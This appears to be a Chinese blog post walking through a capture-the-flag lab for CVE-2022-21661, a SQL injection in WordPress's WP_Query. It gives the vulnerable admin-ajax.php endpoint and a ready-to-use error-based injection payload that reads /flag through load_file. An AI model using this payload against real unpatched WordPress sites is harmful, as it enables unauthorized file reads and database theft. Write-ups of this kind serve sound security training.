一键报错注入获取flag,春秋云镜 CVE-2022-21661,

已于 2024-01-23 09:33:45 修改
阅读量375 收藏 6
点赞数 7
文章标签: 安全漏洞 sql web
于 2024-01-22 17:30:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HMX404/article/details/135753448
版权
WordPress在5.8.3版本中修复了一个核心代码中的SQL注入漏洞,影响WP_Query类,可能导致数据泄露。攻击者通过特定POST参数利用此漏洞,最终获取flag。
摘要由CSDN通过智能技术生成

春秋云镜 CVE-2022-21661 wordpress < 5.8.3 存在sql注入漏洞

靶标介绍

2022年1月6日,wordpress发布了5.8.3版本,修复了一处核心代码WP_Query的sql注入漏洞。WP_Query是wordpress定义的一个类,允许开发者编写自定义查询和使用不同的参数展示文章,并可以直接查询wordpress数据库,在核心框架和插件以及主题中广泛使用。源码位置:www.tar。

在这里插入图片描述
下载源码http://eci-2zejfdjulpocrlx7ojkm.cloudeci1.ichunqiu.com/www.tar
漏洞存在路径为/wp-admin/admin-ajax.php
判断有无方法
Post提交action=函数名,当调用方法正确即调用的WP_Query的构造方法的action无回显,当调用方法不对或者不存在返回0。
在这里插入图片描述

读取前35个字符

在这里插入图片描述

读取后续字符

在这里插入图片描述
获取flag:
flag{df5a3e62-4f2c-4185-938b-a35acee485e4}

POST参数

action=test&data={“tax_query”:{“0”:{“field”:“term_taxonomy_id”,“terms”:[“111) and extractvalue(rand(),concat(0x5e,(substring((select load_file(‘/flag’)),30,35)),0x5e))#”]}}}

师傅,你都点关注了,就别点取消了

HMX404
关注
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
春秋云镜 CVE-2022-4230
qq274575499的博客
05-07 1558
WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。
春秋云镜CVE-2022-32991 Web Based Quiz System SQL注入
Ambition_sec的博客
11-16 663
春秋云镜CVE-2022-32991 Web Based Quiz System SQL注入
[春秋云镜]CVE-2022-0543
niubi707的博客
12-13 881
春秋云镜CVE-2022-0543靶场通关
[春秋云镜]CVE-2022-23316
niubi707的博客
11-29 706
春秋云镜CVE-2022-23316
[春秋云镜]CVE-2022-24112
niubi707的博客
12-04 5999
春秋云镜CVE-2022-24112Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制,容易导致远程代码执行。
[春秋云镜]CVE-2022-22963
niubi707的博客
11-29 676
[春秋云镜]CVE-2022-22963复现
[春秋云镜]CVE-2022-23366
niubi707的博客
11-29 1222
Hospital Management Startup 1.0 sqli 春秋靶场
[春秋云镜] CVE-2022-28060 详细讲解
weixin_60374959的博客
11-28 2993
Victor CMS v1.0 /includes/login.php 存在sql注入。
[春秋云镜]CVE-2022-23134
niubi707的博客
11-29 1587
[春秋云镜]CVE-2022-23134靶场
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
【WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发现的安全问题,涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入,但因为`WP_Query`经常被WordPress插件广泛使用,所以其潜在的危害...
毕业设计_基于springboot+layui+mybatisPlus的中小型仓库物流管理系统源码+SQL+教程+可运行】41004
最新发布
pingguocu3的博客
10-04 221
毕业设计--课程设计--springboot--java 登录管理员账号:system 密码:123456 验证码输入:注意验证码字母要大写。启动项目后运行http://locahost:8080跳转到登录界面即可。后端:springboot、mybatis-plus、shiro。application.yml文件中的数据库连接信息。运行sql目录下的warehouse.sql文件。1.基础管理:商品管理、客户管理、供应商管理;2.物流管理:进货管理、发货管理、交付管理...
PostgreSQL的表碎片
文牧之的博客
09-29 530
表碎片化是指表数据在文件系统中的不连续存储,导致读取和写入操作的效率降低。频繁的插入和删除:导致数据块中出现“空洞”。更新操作:由于 PostgreSQL 的 MVCC(多版本并发控制)机制,更新操作会生成新的行版本,原来的空间会被标记为可重用但是不立即回收。
PostgreSQL 字段使用pglz压缩测试
文牧之的博客
09-30 526
创建测试表1,并插入1000w行数据–创建测试表2,使用 pglz压缩字段,并插入1000w行数据对比表yewu1.test1和yewu1.test2的大小,没体现出压缩了。
PostgreSQL常用数值处理函数简介
lunan的博客
10-04 363
这些数值处理函数提供了丰富的数值计算功能,从简单的数学操作到更高级的科学计算,满足了大多数数据库操作中的数值处理需求。
SQL中基本SELECT语句及常见关键字的使用(内连接,左/右连接)
qq_43800449的博客
09-29 950
DDL(Data Definition Languages)语句:数据定义语言,这些语句定义了不同的数据段、数据库、表、列、索引等数据库对象的定义。常用的语句关键字主要包括 create 、 drop 、 alter 、create等。DML(Data Manipulation Language)语句:数据操纵语句,用于添加、删除、更新和查询数据库记录(增删改查),并检查数据完整性,常用的语句关键字主要包括 insert 、 delete 、 update 等。
春秋云镜CVE-2022-0543
09-04
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark的命令注入漏洞(CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值